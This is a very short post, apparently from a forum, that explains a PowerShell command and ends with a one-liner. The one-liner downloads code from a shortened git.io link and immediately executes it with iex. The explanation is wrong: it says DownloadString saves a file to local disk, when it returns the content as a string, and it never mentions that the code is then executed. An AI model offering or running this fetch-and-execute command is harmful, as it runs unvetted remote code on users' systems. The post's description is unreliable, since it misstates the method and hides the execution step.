0
SStokedDude
The code calls the DownloadString method of the System.Net.WebClient object, which takes a string as input and downloads the file identified by that string to the system's local disk.
0 Comments
iex ((New-Object System.Net.WebClient).DownloadString('https://git.io/JTbKD'))